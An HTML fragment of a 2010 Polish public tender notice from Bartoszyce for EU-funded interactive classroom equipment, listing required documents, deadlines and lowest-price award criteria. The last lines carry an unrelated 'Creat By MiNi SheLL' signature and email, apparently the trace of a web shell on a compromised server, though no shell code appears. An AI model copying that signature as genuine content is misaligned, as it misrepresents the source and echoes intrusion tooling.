<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę
A.2) Formularz cenowy - wypełniony i podpisany przez wykonawcę
A 3) Deklaracja zgodności CE (załączyć do oferty)
A 4) Certyfikat CE (należy załączyć do oferty)
A 5) Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii  
        Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia producenta 
        urządzenia (załączyć do oferty)
A 6) WEEE Procedure (załączyć dokument potwierdzający spełnianie wymogu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.warmia.mazury.pl/bartoszyce_gmina_miejska<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Administracyjny Oświaty w Bartoszycach, ul. Kętrzyńska 22B, 11-200 Bartoszyce. pok nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2010 godzina 10:00, miejsce: Zespół Administracyjny Oświaty w Bartoszycach, ul. Kętrzyńska 22B, 11-200 Bartoszyce. pok nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nazwa Programu: Regionalny Program Operacyjny Warmia i Mazury na lata  2007 - 2013    
                            współfinansowany przez Europejski Fundusz Rozwoju Regionalneg
Działanie 3.1- Inwestycje w infrastrukturę edukacyjną
Oś priorytetowa 3 Infrastruktura społeczna

        
Nazwa projektu - Podniesienie jakości kształcenia w szkołach podstawowych i gimnazjach w Gminie Miejskiej Bartoszyce poprzez zakup wyposażenia do interaktywnych sal lekcyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Ekrany elektryczne                                                       szt    12
2) Tablice interaktywne                                                     szt    11 
3) Pilot do tablicy interaktywnej                                         szt  171
    (system błyskawicznego sprawdzania testów)

4) Projektor                                                                      szt    56.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.65.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Oprogramowanie MS OFFICE 2007                               szt    50
    STANDARD MOLP - licencja edukacyjna                                     
2) Laptop (z oprogramowaniem)                                        szt    56
3) Głośniki do komputera                                                  szt    50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com